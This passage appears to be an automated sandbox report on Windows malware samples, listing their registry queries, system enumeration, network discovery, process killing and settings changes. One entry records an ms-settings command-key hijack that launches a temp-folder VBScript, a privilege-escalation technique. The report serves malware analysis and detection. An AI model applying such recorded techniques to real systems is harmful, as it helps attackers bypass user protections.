| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe = "0" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings\LOCALMACHINE_CD_UNLOCK = "0" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = f8e31e226540db01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = 7e27006f6540db01 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = 93ee955a6540db01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = dcb48a826540db01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = a4195e346540db01 | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\Files\System.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\8504.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\HELPDIR | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Version\ = "6.0" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus\1 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\ | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4284.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0\win32 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ = "C:\\PROGRA~2\\MOUNTT~1\\Lodop\\CAOSOF~1.OCX" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
